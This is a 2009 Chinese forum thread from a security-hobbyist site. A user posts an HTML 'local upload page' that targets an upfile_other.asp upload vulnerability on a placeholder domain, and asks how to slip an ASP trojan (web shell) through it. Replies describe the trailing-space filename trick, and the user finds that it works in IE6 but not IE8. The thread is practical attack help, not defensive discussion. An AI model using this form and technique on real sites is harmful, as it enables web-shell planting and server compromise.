标题:
本地上传页面的问题??
[打印本页]
作者:
jhxx
时间:
2009-12-15 15:06
标题:
本地上传页面的问题??
在利用本地上传页面时,第一个空选图片很正常,第二个空选择一个ASP木马,但是后面要加个空格,请问下后面的那个空格怎么加上去的,我试了很长时间也没有搞会,知道的告诉声,非常感谢。
作者:
柔肠寸断
时间:
2009-12-15 15:26
你利用的是哪个漏洞的本地上传,最好把代码也发上来分析下
作者:
jhxx
时间:
2009-12-15 18:22
本帖最后由 jhxx 于 2009-12-15 18:23 编辑
本地页面上传代码在下面:
<!-注意:下面就是填寫漏洞文件地址的地方,其他部分代碼禁止修改!---by wiki!-->
<form action=http://www.xxxxx.com/upfile_other.asp method=post name=form1 onsubmit=return
click() enctype=multipart/form-data>
<div align="center"><strong>·本地上传页·穆馬和文件·利用漏洞上傳·作弊工具·</strong></div>
<p align="center">源頭文件路徑:
<input name="filename" type="file" class="txt1" size="20">
</p>
<p align="center">目標文件路徑:
<input name="filename1" type=file class=txt1 size=20>
</p>
<p align="center">
<input type=submit name=submit value=·立即上傳· style=border"1px double rgb(88.88.88);font:9pt>
<input name=imgwidth type=hidden id=imgwidth>
<input name=imgheight type=hidden id=imgheight>
<input name=aligntype type=hidden id="channelid" value="0">
<input name="channelid" type="hidden" id="channelurlid" value=0>
<input name="id" type="hidden" id="id2">
</p>
<p align="center">(注意:具體漏洞文件路徑要在源代碼中修改!)</p>
<p> </p>
<p align="center">版權所有 IEANSOFT HACK STUDIO INC 保留所有權利!</p>
<form>
谢谢小柔帮看看了!!!
作者:
柔肠寸断
时间:
2009-12-15 19:02
是针对upfile_other.asp的上传漏洞
具体什么我也不清楚
加空格很简单,就是你选择好文件之后在文件后加一个空格,然后再点击上传即可
作者:
jhxx
时间:
2009-12-15 19:41
选完文件后按空格就出来文件选择对话框了,我就纳闷了,看视频别人直接加就可以,为什么我的就不行呢
作者:
jhxx
时间:
2009-12-17 21:52
知道原因了,浏览器的原因,IE8点空格就会出现选择对话框,把浏览器换成IE6就可以了
欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/)
Powered by Discuz! 7.2